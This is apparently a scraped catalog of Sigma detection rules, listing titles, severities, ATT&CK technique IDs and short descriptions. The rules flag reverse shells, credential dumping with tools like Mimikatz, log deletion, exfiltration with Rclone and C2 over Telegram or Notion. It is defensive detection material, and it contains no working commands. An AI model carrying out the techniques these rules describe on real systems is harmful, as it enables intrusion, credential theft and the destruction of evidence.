Detects the use of grep to identify information about the operating system architecture. Often combined beforehand with the execution of "uname" or "cat /proc/cpuinfo"
Potential GobRAT File Discovery Via Grep
sigma high
T1082
imProcessCreate
Detects the use of grep to discover specific files created by the GobRAT malware
imFileEvent
Detects the creation of shell scripts under the "profile.d" path.
imProcessCreate
Detects execution of shells from a parent process located in a temporary (/tmp) directory
Suspicious Nohup Execution
sigma high
imProcessCreate
Detects execution of binaries located in potentially suspicious locations via "nohup"
Wget Creating Files in Tmp Directory
sigma medium
T1105
imFileEvent
Detects the use of wget to download content in a temporary directory such as "/tmp" or "/var/tmp"
Potential SmadHook.DLL Sideloading
sigma high
T1574.001
DeviceImageLoadEvents
Detects potential DLL sideloading of "SmadHook.dll", a DLL used by SmadAV antivirus
PowerShell Core DLL Loaded Via Office Application
sigma medium
DeviceImageLoadEvents
Detects PowerShell core DLL being loaded by an Office Product
T1565.001
imProcessCreate
Detects changes of sensitive and critical files. Monitors files that you don't expect to change without planning on Linux system.
T1218.010
imProcessCreate
Detects potentially suspicious child processes of "regsvr32.exe".
Scripting/CommandLine Process Spawned Regsvr32
sigma medium
T1218.010
imProcessCreate
Detects various command line and scripting engines/processes such as "PowerShell", "Wscript", "Cmd", etc. spawning a "regsvr32" instance.
T1059.005T1059.001T1218
imProcessCreate
Detects suspicious child processes of a Windows shell and scripting processes such as wscript, rundll32, powershell, mshta...etc.
imProcessCreate
Detects potentially suspicious child processes of "GoogleUpdate.exe"
Uncommon Child Process Spawned By Odbcconf.EXE
sigma medium
T1218.008
imProcessCreate
Detects an uncommon child process of "odbcconf.exe" binary which normally shouldn't have any child processes.
T1102T1567T1105
imNetworkSession
Detects an a non-browser process interacting with the Telegram API which could indicate use of a covert C2
Certificate Exported Via PowerShell
sigma medium
T1552.004T1059.001
imProcessCreate
Detects calls to cmdlets that are used to export certificates from the local certificate store. Threat actors were seen abusing this to steal private keys from compromised machines.
T1036.003
imRegistry
Detects potential WerFault "ReflectDebugger" registry value abuse for persistence.
Potential WWlib.DLL Sideloading
sigma medium
T1574.001
DeviceImageLoadEvents
Detects potential DLL sideloading of "wwlib.dll"
Telegram API Access
sigma medium
T1071.001T1102.002
imWebSession
Detects suspicious requests to Telegram API without the usual Telegram User-Agent
Bitsadmin to Uncommon TLD
sigma high
T1071.001T1197
imWebSession
Detects Bitsadmin connections to domains with uncommon TLDs
Potentially Suspicious Rundll32 Activity
sigma medium
T1218.011
imProcessCreate
Detects suspicious execution of rundll32, with specific calls to some DLLs with known LOLBIN functionalities
LiveKD Driver Creation By Uncommon Process
sigma high
imFileEvent
Detects the creation of the LiveKD driver by a process image other than "livekd.exe".
LiveKD Driver Creation
sigma medium
imFileEvent
Detects the creation of the LiveKD driver, which is used for live kernel debugging
LiveKD Kernel Memory Dump File Created
sigma high
imFileEvent
Detects the creation of a file that has the same name as the default LiveKD kernel memory dump.
Suspicious RDP Redirect Using TSCON
sigma high
T1563.002T1021.001
imProcessCreate
Detects a suspicious RDP session redirect using tscon.exe
Dllhost.EXE Execution Anomaly
sigma high
T1055
imProcessCreate
Detects a "dllhost" process spawning with no commandline arguments which is very rare to happen and could indicate process injection activity or malware mimicking similar system processes.
Potential Chrome Frame Helper DLL Sideloading
sigma medium
T1574.001
DeviceImageLoadEvents
Detects potential DLL sideloading of "chrome_frame_helper.dll"
Wscript Shell Run In CommandLine
sigma medium
T1059
imProcessCreate
Detects the presence of the keywords "Wscript", "Shell" and "Run" in the command, which could indicate a suspicious activity
Potential RoboForm.DLL Sideloading
sigma medium
T1574.001
DeviceImageLoadEvents
Detects potential DLL sideloading of "roboform.dll", a DLL used by RoboForm Password Manager
Microsoft Excel Add-In Loaded From Uncommon Location
sigma medium
T1204.002
DeviceImageLoadEvents
Detects Microsoft Excel loading an Add-In (.xll) file from an uncommon location
Potential Persistence Via Custom Protocol Handler
sigma medium
T1112
imRegistry
Detects potential persistence activity via the registering of a new custom protocole handlers. While legitimate applications register protocole handlers often times during installation. And attacker c
Potential Wazuh Security Platform DLL Sideloading
sigma medium
T1574.001
DeviceImageLoadEvents
Detects potential DLL side loading of DLLs that are part of the Wazuh security platform
imFileEvent
Detects the creation of binaries in the WinSxS folder by non-system processes
HackTool - Dumpert Process Dumper Default File
sigma critical
T1003.001
imFileEvent
Detects the creation of the default dump file used by Outflank Dumpert tool. A process dumper, which dumps the lsass process memory
Potential AMSI Bypass Using NULL Bits
sigma medium
T1685
imProcessCreate
Detects usage of special strings/null bits in order to potentially bypass AMSI functionalities
Potential Suspicious PowerShell Module File Created
sigma medium
imFileEvent
Detects the creation of a new PowerShell module in the first folder of the module directory structure "\WindowsPowerShell\Modules\malware\malware.psm1". This is somewhat an uncommon practice as legiti
Potential SysInternals ProcDump Evasion
sigma high
T1036T1003.001
imProcessCreate
Detects uses of the SysInternals ProcDump utility in which ProcDump or its output get renamed, or a dump file is moved or copied to a different name
PowerShell Module File Created
sigma low
imFileEvent
Detects the creation of a new PowerShell module ".psm1", ".psd1", ".dll", ".ps1", etc.
imFileEvent
Detects PowerShell creating a PowerShell file (.ps1). While often times this behavior is benign, sometimes it can be a sign of a dropper script trying to achieve persistence.
Rclone Config File Creation
sigma medium
T1567.002
imFileEvent
Detects Rclone config files being created
T1218
imProcessCreate
Detects calls to the AtomicTestHarnesses "Invoke-ATHRemoteFXvGPUDisablementCommand" which is designed to abuse the "RemoteFXvGPUDisablement.exe" binary to run custom PowerShell code via module load-or
T1036T1036.003
imFileEvent
Detects the presence of unicode characters which are homoglyphs, or identical in appearance, to ASCII letter characters. This is used as an obfuscation and masquerading techniques. Only "perfect" homo
T1036T1036.003
imProcessCreate
Detects the presence of unicode characters which are homoglyphs, or identical in appearance, to ASCII letter characters. This is used as an obfuscation and masquerading techniques. Only "perfect" homo
Potential SolidPDFCreator.DLL Sideloading
sigma medium
T1574.001
DeviceImageLoadEvents
Detects potential DLL sideloading of "SolidPDFCreator.dll"
NTDS.DIT Created
sigma low
T1003.003
imFileEvent
Detects creation of a file named "ntds.dit" (Active Directory Database)
NTDS Exfiltration Filename Patterns
sigma high
T1003.003
imFileEvent
Detects creation of files with specific name patterns seen used in various tools that export the NTDS.DIT for exfiltration.
Potential DLL Sideloading Of Libcurl.DLL Via GUP.EXE
sigma medium
T1574.001
DeviceImageLoadEvents
Detects potential DLL sideloading of "libcurl.dll" by the "gup.exe" process from an uncommon location
T1068
imFileEvent
Detects creation of the Process Explorer drivers by processes other than Process Explorer (procexp) itself. Hack tools or malware may use the Process Explorer driver to elevate privileges, drops it to
T1068
imFileEvent
Detects creation of the Process Monitor driver by processes other than Process Monitor (procmon) itself.
Suspicious File Created In PerfLogs
sigma medium
T1059
imFileEvent
Detects suspicious file based on their extension being created in "C:\PerfLogs\". Note that this directory mostly contains ".etl" files
VHD Image Download Via Browser
sigma medium
T1587.001
imFileEvent
Detects creation of ".vhd"/".vhdx" files by browser processes. Malware can use mountable Virtual Hard Disk ".vhd" files to encapsulate payloads and evade security controls.
Potential Base64 Encoded User-Agent
sigma medium
T1071.001
imWebSession
Detects User Agent strings that end with an equal sign, which can be a sign of base64 encoding.
Suspicious Base64 Encoded User-Agent
sigma medium
T1071.001
imWebSession
Detects suspicious encoded User-Agent strings, as seen used by some malware.
Suspicious Child Process Of SQL Server
sigma high
T1505.003T1190
imProcessCreate
Detects suspicious child processes of the SQLServer process. This could indicate potential RCE or SQL Injection.
Suspicious Child Process Of Veeam Dabatase
sigma critical
imProcessCreate
Detects suspicious child processes of the Veeam service process. This could indicate potential RCE or SQL Injection.
Veeam Backup Database Suspicious Query
sigma medium
T1005
imProcessCreate
Detects potentially suspicious SQL queries using SQLCmd targeting the Veeam backup databases in order to steal information.
T1102
imNetworkSession
Detects a non-browser process communicating with the Notion API. This could indicate potential use of a covert C2 channel such as "OffensiveNotion C2"
Suspicious Curl File Upload - Linux
sigma medium
T1567T1105
imProcessCreate
Detects a suspicious curl process start the adds a file to a web request
Potential Xterm Reverse Shell
sigma medium
T1059
imProcessCreate
Detects usage of "xterm" as a potential reverse shell tunnel
Potential Azure Browser SSO Abuse
sigma low
T1574.001
DeviceImageLoadEvents
Detects abusing Azure Browser SSO by requesting OAuth 2.0 refresh tokens for an Azure-AD-authenticated Windows user (i.e. the machine is joined to Azure AD and a user logs in with their Azure AD accou
Potential Libvlc.DLL Sideloading
sigma medium
T1574.001
DeviceImageLoadEvents
Detects potential DLL sideloading of "libvlc.dll", a DLL that is legitimately used by "VLC.exe"
HTML Help HH.EXE Suspicious Child Process
sigma high
T1047T1059.001T1059.003T1059.005T1059.007T1218T1218.001T1218.010T1218.011T1566T1566.001
imProcessCreate
Detects a suspicious child process of a Microsoft HTML Help (HH.exe)
T1218
imProcessCreate
Detects child processes of Microsoft.NodejsTools.PressAnyKey.exe that can be used to execute any other binary
Bash Interactive Shell
sigma low
imProcessCreate
Detects execution of the bash shell with the interactive flag "-i".
Potential Netcat Reverse Shell Execution
sigma high
T1059
imProcessCreate
Detects execution of netcat with the "-e" flag followed by common shells. This could be a sign of a potential reverse shell setup.
Potential Perl Reverse Shell Execution
sigma high
imProcessCreate
Detects execution of the perl binary with the "-e" flag and common strings related to potential reverse shell activity
Potential PHP Reverse Shell
sigma high
imProcessCreate
Detects usage of the PHP CLI with the "-r" flag which allows it to run inline PHP code. The rule looks for calls to the "fsockopen" function which allows the creation of sockets. Attackers often lever
Potential Ruby Reverse Shell
sigma medium
imProcessCreate
Detects execution of ruby with the "-e" flag and calls to "socket" related functions. This could be an indication of a potential attempt to setup a reverse shell
Arbitrary MSI Download Via Devinit.EXE
sigma medium
T1218
imProcessCreate
Detects a certain command line flag combination used by "devinit.exe", which can be abused as a LOLBIN to download arbitrary MSI packages on a Windows system
Audio Capture via PowerShell
sigma medium
T1123
imProcessCreate
Detects audio capture via PowerShell Cmdlet.
T1140T1059.001
imProcessCreate
Detects usage of a base64 encoded "FromBase64String" cmdlet in a process command line
PowerShell Base64 Encoded IEX Cmdlet
sigma high
T1059.001
imProcessCreate
Detects usage of a base64 encoded "IEX" cmdlet in a process command line
T1059.001T1027
imProcessCreate
Detects suspicious base64 encoded and obfuscated "LOAD" keyword used in .NET "reflection.assembly"
CLR DLL Loaded Via Office Applications
sigma medium
T1204.002
DeviceImageLoadEvents
Detects CLR DLL being loaded by an Office Product
DotNET Assembly DLL Loaded Via Office Application
sigma medium
T1204.002
DeviceImageLoadEvents
Detects any assembly DLL being loaded by an Office Product
Potential CobaltStrike Process Patterns
sigma high
T1059
imProcessCreate
Detects potential process patterns related to Cobalt Strike beacon activity
T1036
imProcessCreate
Detects potential evasion or obfuscation attempts using bogus path traversal via the commandline
T1059
imFileEvent
Detects Windows shells and scripting applications that write files to suspicious folders
WmiPrvSE Spawned A Process
sigma medium
T1047
imProcessCreate
Detects WmiPrvSE spawning a process
Suspicious Program Names
sigma high
T1059
imProcessCreate
Detects suspicious patterns in program names or folders that are often found in malicious samples or hacktools
Potential Iviewers.DLL Sideloading
sigma high
T1574.001
DeviceImageLoadEvents
Detects potential DLL sideloading of "iviewers.dll" (OLE/COM Object Interface Viewer)
T1574.001
DeviceImageLoadEvents
Detects potential DLL sideloading activity via the Aruba Networks Virtual Intranet Access "arubanetsvc.exe" process using DLL Search Order Hijacking
Microsoft Office DLL Sideload
sigma high
T1574.001
DeviceImageLoadEvents
Detects DLL sideloading of DLLs that are part of Microsoft Office from non standard location
Potential Rcdll.DLL Sideloading
sigma high
T1574.001
DeviceImageLoadEvents
Detects potential DLL sideloading of rcdll.dll
Gzip Archive Decode Via PowerShell
sigma medium
T1132.001
imProcessCreate
Detects attempts of decoding encoded Gzip archives via PowerShell.
Potential Qakbot Registry Activity
sigma high
T1112
imRegistry
Detects a registry key used by IceID in a campaign that distributes malicious OneNote files
Linux Package Uninstall
sigma low
T1070
imProcessCreate
Detects linux package removal using builtin tools such as "yum", "apt", "apt-get" or "dpkg".
Uninstall Crowdstrike Falcon Sensor
sigma high
T1685
imProcessCreate
Adversaries may disable security tools to avoid possible detection of their tools and activities by uninstalling Crowdstrike Falcon
HackTool - CrackMapExec Execution
sigma high
T1047T1053T1059.003T1059.001T1110T1201
imProcessCreate
This rule detect common flag combinations used by CrackMapExec in order to detect its use even if the binary has been replaced.
imProcessCreate
The rule detects the use of Wmiexec via PowerShell with specific command-line flags, a
Wmiexec Default Output File
sigma critical
T1047
imFileEvent
Detects the creation of the default output filename used by the wmiexec tool
Copy From VolumeShadowCopy Via Cmd.EXE
sigma high
T1490
imProcessCreate
Detects the execution of the builtin "copy" command that targets a shadow copy (sometimes used to copy registry hives that are in use)
NtdllPipe Like Activity Execution
sigma high
imProcessCreate
Adversaries may use NtdllPipe techniques to exfiltrate or execute malicious code by leveraging ntdll.dll content, evading traditional AV/EDR detection mechanisms. SOC teams should pro
Persistence Via Sticky Key Backdoor
sigma critical
T1546.008
imProcessCreate
By replacing the sticky keys executable with the local admins CMD executable, an attacker is able to access a privileged windows console session without authenticating to the system. When the sticky k
Sticky Key Like Backdoor Execution
sigma critical
T1546.008
imProcessCreate
Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen
Suspicious CodePage Switch Via CHCP
sigma medium
T1036
imProcessCreate
Detects a code page switch in command line or batch scripts to a rare language
T1059.001
imProcessCreate
Detects Windows command lines that miss a space before or after the /c flag when running a command using the cmd.exe. This could be a sign of obfuscation of a fat finger problem (typo by the developer
Potential Dosfuscation Activity
sigma medium
T1059
imProcessCreate
Detects possible payload obfuscation via the commandline
VolumeShadowCopy Symlink Creation Via Mklink
sigma high
T1003.002T1003.003
imProcessCreate
Shadow Copies storage symbolic link creation using operating systems utilities
HackTool - F-Secure C3 Load by Rundll32
sigma critical
T1218.011
imProcessCreate
F-Secure C3 produces DLLs with a default exported StartNodeRelay function.
HackTool - Sliver C2 Implant Activity Pattern
sigma critical
T1059
imProcessCreate
Detects process activity patterns as seen being used by Sliver C2 framework implants
Potential Persistence Via Event Viewer Events.asp
sigma medium
T1112
imRegistry
Detects potential registry persistence technique using the Event Viewer "Events.asp" technique
PUA - Potential PE Metadata Tamper Using Rcedit
sigma medium
T1036.003T1036T1027.005T1027
imProcessCreate
Detects the use of rcedit to potentially alter executable PE metadata properties, which could conceal efforts to rename system utilities for defense evasion.
PUA - Rclone Execution
sigma high
T1567.002
imProcessCreate
Detects execution of RClone utility for exfiltration as used by various ransomwares strains like REvil, Conti, FiveHands, etc
T1087.002
imProcessCreate
Detects active directory enumeration activity using known AdFind CLI flags
Remote Access Tool - AnyDesk Piped Password Via CLI
sigma medium
T1219.002
imProcessCreate
Detects piping the password to an anydesk instance via CMD and the '--set-password' flag.
T1219.002
imProcessCreate
Detects AnyDesk Remote Desktop silent installation. Which can be used by attackers to gain remote access.
Remote Access Tool - GoToAssist Execution
sigma medium
T1219.002
imProcessCreate
An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target
Remote Access Tool - LogMeIn Execution
sigma medium
T1219.002
imProcessCreate
An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target
imProcessCreate
Detects execution of Remote Utilities RAT (RURAT) from an unusual location (outside of 'C:\Program Files')
Remote Access Tool - ScreenConnect Execution
sigma medium
T1219.002
imProcessCreate
An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target
T1053.005T1059.001
imProcessCreate
Detects the creation of a schtask via PowerSploit or Empire Default Configuration.
T1140
imProcessCreate
Detects potential commandline obfuscation using known escape characters
Arbitrary Binary Execution Using GUP Utility
sigma medium
imProcessCreate
Detects execution of the Notepad++ updater (gup) to launch other commands or executables
Potential Credential Dumping Via LSASS Process Clone
sigma critical
T1003T1003.001
imProcessCreate
Detects a suspicious LSASS process process clone that could be a sign of credential dumping activity
User Added to Local Administrators Group
sigma medium
T1098
imProcessCreate
Detects addition of users to the local administrator group via "Net" or "Add-LocalGroupMember".
T1106T1059.003T1218.011
imProcessCreate
Detects actions caused by the RedMimicry Winnti playbook a automated breach emulations utility
Procdump Execution
sigma medium
T1036T1003.001
imProcessCreate
Detects usage of the SysInternals Procdump utility
imProcessCreate
Detects suspicious launch of the PSEXESVC service on this system and a sub process run as LOCAL_SYSTEM (-s), which means that someone remotely started a command on this system running it with highest
Rundll32 Execution Without Parameters
sigma high
T1021.002T1570T1569.002
imProcessCreate
Detects rundll32 execution without parameters as observed when running Metasploit windows/smb/psexec exploit module
T1036.007
imProcessCreate
Detect execution of suspicious double extension files in ParentCommandLine
imFileEvent
Detects suspicious files created via the OneNote application. This could indicate a potential malicious ".one"/".onepkg" file was executed as seen being used in malware activity in the wild
T1055
DeviceImageLoadEvents
Detects .NET CLR DLLs being loaded by scripting applications such as wscript or cscript. This could be an indication of potential suspicious execution.
T1547.001
imFileEvent
Detects msdt.exe creating files in suspicious directories which could be a sign of exploitation of either Follina or Dogwalk vulnerabilities
T1547.001
imFileEvent
Detects PowerShell writing startup shortcuts. This procedure was highlighted in Red Canary Intel Insights Oct. 2021, "We frequently observe adversaries using PowerShell to write malicious .lnk files i
PSEXEC Remote Execution File Artefact
sigma high
T1136.002T1543.003T1570
imFileEvent
Detects creation of the PSEXEC key file. Which is created anytime a PsExec command is executed. It gets written to the file system and will be recorded in the USN Journal on the target system
Suspicious DotNET CLR Usage Log Artifact
sigma high
T1218
imFileEvent
Detects the creation of Usage Log files by the CLR (clr.dll). These files are named after the executing process once the assembly is finished executing for the first time in the (user) session context
imFileEvent
Detects the creation of suspicious files and folders inside the user's AppData folder but not inside any of the common and well known directories (Local, Romaing, LocalLow). This method could be used
HackTool - Jlaive In-Memory Assembly Execution
sigma medium
T1059.003
imProcessCreate
Detects the use of Jlaive to execute assemblies in a copied PowerShell
T1566.001
imFileEvent
Detects the creation of a office macro file from a a suspicious process
Potential Persistence Via Outlook Form
sigma high
T1137.003
imFileEvent
Detects the creation of a new Outlook form which can contain malicious code
T1546.003
DeviceImageLoadEvents
Detects signs of the WMI script host process "scrcons.exe" loading scripting DLLs which could indicates WMI ActiveScriptEventConsumers EventConsumers activity.
T1685.001
imProcessCreate
Threat actors can use an older version of the auditpol binary available inside the NT resource kit to change audit policy configuration to impair detection capability. This can be carried out by selec
HackTool - Covenant PowerShell Launcher
sigma high
T1059.001T1564.003
imProcessCreate
Detects suspicious command lines used in Covenant luanchers
T1059.001
imProcessCreate
Detects suspicious powershell command line parameters used in Empire
HackTool - Empire PowerShell UAC Bypass
sigma critical
T1548.002
imProcessCreate
Detects some Empire PowerShell UAC bypass methods
HackTool - Mimikatz Execution
sigma high
T1003.001T1003.002T1003.004T1003.005T1003.006
imProcessCreate
Detection well-known mimikatz command line arguments
T1047T1021.003
imProcessCreate
Detects wmiexec/dcomexec/atexec/smbexec from Impacket framework
PUA - 3Proxy Execution
sigma high
T1572
imProcessCreate
Detects the use of 3proxy, a tiny free proxy server
PUA - Adidnsdump Execution
sigma low
T1018
imProcessCreate
This tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks Python 3 and python.exe must be installed, Usee to Query/modify DNS records for Activ
PUA - AdvancedRun Suspicious Execution
sigma high
T1134.002
imProcessCreate
Detects the execution of AdvancedRun utility in the context of the TrustedInstaller, SYSTEM, Local Service or Network Service accounts
PUA - CsExec Execution
sigma high
T1587.001T1569.002
imProcessCreate
Detects the use of the lesser known remote execution tool named CsExec a PsExec alternative
PUA - DIT Snapshot Viewer
sigma high
T1003.003
imProcessCreate
Detects the use of Ditsnap tool, an inspection tool for Active Directory database, ntds.dit.
PUA - Mouse Lock Execution
sigma medium
T1056.002
imProcessCreate
In Kaspersky's 2020 Incident Response Analyst Report they listed legitimate tool "Mouse Lock" as being used for both credential access and collection in security incidents.
PUA - Ngrok Execution
sigma high
T1572
imProcessCreate
Detects the use of Ngrok, a utility used for port forwarding and tunneling, often used by threat actors to make local protected services publicly available. Involved domains are bin.equinox.io for dow
Suspicious Curl.EXE Download
sigma high
T1105
imProcessCreate
Detects a suspicious curl process start on Windows and outputs the requested document to a local file
New Service Creation Using PowerShell
sigma low
T1543.003
imProcessCreate
Detects the creation of a new service using powershell.
T1040
imProcessCreate
Detects potential network sniffing via use of network tools such as "tshark", "windump". Network sniffing refers to using the network interface on a system to monitor or capture information sent over
T1202
DeviceImageLoadEvents
Detects both of CVE-2022-30190 (Follina) and DogWalk vulnerabilities exploiting msdt.exe binary to load the "sdiageng.dll" library
T1218.003
DeviceImageLoadEvents
Detects cmstp loading "dll" or "ocx" files from suspicious locations
Dynamic CSharp Compile Artefact
sigma low
T1027.004
imFileEvent
When C# is compiled dynamically, a .cmdline file will be created as a part of the process. Certain processes are not typically observed compiling C# code, but can do so without touching disk. This can
HackTool - SILENTTRINITY Stager DLL Load
sigma high
T1071
DeviceImageLoadEvents
Detects SILENTTRINITY stager dll loading activity
Potential DLL Sideloading Via VMware Xfer
sigma high
T1574.001
DeviceImageLoadEvents
Detects loading of a DLL by the VMware Xfer utility from the non-default directory which may be an attempt to sideload arbitrary DLL
Tomcat WebServer Logs Deleted
sigma medium
T1070
imFileEvent
Detects the deletion of tomcat WebServer logs which may indicate an attempt to destroy forensic evidence
Backup Files Deleted
sigma medium
T1490
imFileEvent
Detects deletion of files with extensions often used for backup files. Adversaries may delete or remove built-in operating system data and turn off services designed to aid in the recovery of a corrup
EventLog EVTX File Deleted
sigma medium
T1070
imFileEvent
Detects the deletion of the event log files which may indicate an attempt to destroy forensic evidence
File Deleted Via Sysinternals SDelete
sigma medium
T1070.004
imFileEvent
Detects the deletion of files by the Sysinternals SDelete utility. It looks for the common name pattern used to rename files.
IIS WebServer Access Logs Deleted
sigma medium
T1070
imFileEvent
Detects the deletion of IIS WebServer access logs which may indicate an attempt to destroy forensic evidence
PowerShell Console History Logs Deleted
sigma medium
T1070
imFileEvent
Detects the deletion of the PowerShell console History logs which may indicate an attempt to destroy forensic evidence
TeamViewer Log File Deleted
sigma low
T1070.004
imFileEvent
Detects the deletion of the TeamViewer log files which may indicate an attempt to destroy forensic evidence
Unusual File Deletion by Dns.exe
sigma high
T1133
imFileEvent
Detects an unexpected file being deleted by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)
HackTool - SharpEvtMute Execution
sigma high
T1685.001
imProcessCreate
Detects the use of SharpEvtHook, a tool that tampers with the Windows event logs
T1546.003
imProcessCreate
Detects WMIC executions in which an event consumer gets created. This could be used to establish persistence
Potential SMB Relay Attack Tool Execution
sigma critical
T1557.001
imProcessCreate
Detects different hacktools used for relay attacks on Windows for privilege escalation
T1685
imProcessCreate
Detects uninstallation or termination of security products using the WMIC utility
PUA - CleanWipe Execution
sigma high
T1685
imProcessCreate
Detects the use of CleanWipe a tool usually used to delete Symantec antivirus.
PUA - RunXCmd Execution
sigma high
T1569.002
imProcessCreate
Detects the use of the RunXCmd tool to execute commands with System or TrustedInstaller accounts
PUA - WebBrowserPassView Execution
sigma medium
T1555.003
imProcessCreate
Detects the execution of WebBrowserPassView.exe. A password recovery tool that reveals the passwords stored by the following Web browsers, Internet Explorer (Version 4.0 - 11.0), Mozilla Firefox (All
Suspicious Obfuscated PowerShell Code
sigma high
imProcessCreate
Detects suspicious UTF16 and base64 encoded and often obfuscated PowerShell code often used in command lines
Suspicious Process Created Via Wmic.EXE
sigma high
T1047
imProcessCreate
Adversaries may leverage WMIC.EXE to execute malicious processes like rundll32 or regsrv
Suspicious WindowsTerminal Child Processes
sigma medium
imProcessCreate
Detects suspicious children spawned via the Windows Terminal application which could be a sign of persistence via WindowsTerminal (see references section)
Windows Binary Executed From WSL
sigma medium
T1202
imProcessCreate
Detects the execution of Windows binaries from within a WSL instance. This could be used to masquerade parent-child relationships
HackTool - CrackMapExec Process Patterns
sigma high
T1003.001
imProcessCreate
Detects suspicious process patterns found in logs when CrackMapExec is used
HackTool - SharpChisel Execution
sigma high
T1090.001
imProcessCreate
Detects usage of the Sharp Chisel via the commandline arguments
HackTool - SharpUp PrivEsc Tool Execution
sigma critical
T1615T1569.002T1574.005
imProcessCreate
Detects the use of SharpUp, a tool for local privilege escalation
HackTool - SILENTTRINITY Stager Execution
sigma high
T1071
imProcessCreate
Detects SILENTTRINITY stager use via PE metadata
HackTool - WinRM Access Via Evil-WinRM
sigma medium
T1021.006
imProcessCreate
Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.
Potential Crypto Mining Activity
sigma high
T1496
imProcessCreate
Detects command line parameters or strings often used by crypto miners
PUA - Chisel Tunneling Tool Execution
sigma high
T1090.001
imProcessCreate
Detects usage of the Chisel tunneling tool via the commandline arguments
PUA - NirCmd Execution As LOCAL SYSTEM
sigma high
T1569.002
imProcessCreate
Detects the use of NirCmd tool for command execution as SYSTEM user
T1005
imProcessCreate
Detects dump of credentials in VeeamBackup dbo
GAC DLL Loaded Via Office Applications
sigma high
T1204.002
DeviceImageLoadEvents
Detects any GAC DLL being loaded by an Office Product
VBA DLL Loaded Via Office Application
sigma high
T1204.002
DeviceImageLoadEvents
Detects VB DLL's loaded by an office application. Which could indicate the presence of VBA Macros.
T1059T1202
imProcessCreate
Detects an attacker trying to enable the outlook security setting "EnableUnsafeClientMailRules" which allows outlook to run applications or execute macros
Suspicious Remote Child Process From Outlook
sigma high
T1059T1202
imProcessCreate
Detects a suspicious child process spawning from Outlook where the image is located in a remote location (SMB/WebDav shares).
T1685
imRegistry
Detects the removal of folders from the "ProtectedFolders" list of of exploit guard. This could indicate an attacker trying to launch an encryption process or trying to manipulate data inside of the p
GatherNetworkInfo.VBS Reconnaissance Script Output
sigma medium
imFileEvent
Detects creation of files which are the results of executing the built-in reconnaissance script "C:\Windows\System32\gatherNetworkInfo.vbs".
HackTool - XORDump Execution
sigma high
T1036T1003.001
imProcessCreate
Detects suspicious use of XORDump process memory dumping utility
New Outlook Macro Created
sigma medium
T1137T1008T1546
imFileEvent
Detects the creation of a macro file for Outlook.
T1137.006
imFileEvent
Detects potential persistence activity via startup add-ins that load when Microsoft Office starts (.wll/.xll are simply .dll fit for Word or Excel).
PUA - Netcat Suspicious Execution
sigma high
T1095
imProcessCreate
Detects execution of Netcat. Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network
imFileEvent
Detects creation of files with the ".pub" extension in suspicious or uncommon locations. This could be a sign of attackers abusing Publisher documents
Suspicious Outlook Macro Created
sigma high
T1137T1008T1546
imFileEvent
Detects the creation of a macro file for Outlook.
T1615T1059.005
imProcessCreate
Detects execution of the built-in script located in "C:\Windows\System32\gatherNetworkInfo.vbs". Which can be used to gather information about the target machine
T1070T1112
imRegistry
Detects the deletion of registry keys containing the MSTSC connection history
WMI Backdoor Exchange Transport Agent
sigma critical
T1546.003
imProcessCreate
Detects a WMI backdoor in Exchange Transport Agents via WMI event filters
HackTool - Impacket Tools Execution
sigma high
T1557.001
imProcessCreate
Detects the execution of different compiled Windows binaries of the impacket toolset (based on names or part of their names - could lead to false positives)
Potential LethalHTA Technique Execution
sigma high
T1218.005
imProcessCreate
Detects potential LethalHTA technique where the "mshta.exe" is spawned by an "svchost.exe" process
imRegistry
Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence. The disk cleanup manager is part of the operating system. It displays the dialog box […] Th
Files Added To An Archive Using Rar.EXE
sigma low
T1560.001
imProcessCreate
Detects usage of "rar" to add files to an archive for potential compression. An adversary may compress data (e.g. sensitive documents) that is collected prior to exfiltration in order to make it porta
T1003.002
imProcessCreate
Detects the usage of "pypykatz" to obtain stored credentials. Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database through Windows registry where the
HackTool - Quarks PwDump Execution
sigma high
T1003.002
imProcessCreate
Detects usage of the Quarks PwDump tool via commandline arguments
T1574.001T1112
imProcessCreate
Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required)
Potential Meterpreter/CobaltStrike Activity
sigma high
T1134.001T1134.002
imProcessCreate
Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service starting
Potential MSTSC Shadowing Activity
sigma high
T1563.002
imProcessCreate
Detects RDP session hijacking by using MSTSC shadowing
Unusual Child Process of dns.exe
sigma high
T1133
imProcessCreate
Detects an unexpected process spawning from dns.exe which may indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)
HackTool - ADCSPwn Execution
sigma high
T1557.001
imProcessCreate
Detects command line parameters used by ADCSPwn, a tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service
HackTool - Bloodhound/Sharphound Execution
sigma high
T1087.001T1087.002T1482T1069.001T1069.002T1059.001
imProcessCreate
Detects command line parameters used by Bloodhound and Sharphound hack tools
HackTool - DInjector PowerShell Cradle Execution
sigma critical
T1055
imProcessCreate
Detects the use of the Dinject PowerShell cradle based on the specific flags
T1110.002
imProcessCreate
Execute Hashcat.exe with provided SAM file from registry of Windows and Password list to crack against
HackTool - Htran/NATBypass Execution
sigma high
T1090
imProcessCreate
Detects executable names or flags used by Htran or Htran-like tools (e.g. NATBypass)
T1110T1110.001
imProcessCreate
Detects command line parameters used by Hydra password guessing hack tool
HackTool - SharPersist Execution
sigma high
T1053
imProcessCreate
Detects the execution of the hacktool SharPersist - used to deploy various different kinds of persistence mechanisms
Potential Discovery Activity Via Dnscmd.EXE
sigma medium
imProcessCreate
Detects an attempt to leverage dnscmd.exe to enumerate the DNS zones of a domain. DNS zones used to host the DNS records for a particular domain.
T1543.003T1574.011
imProcessCreate
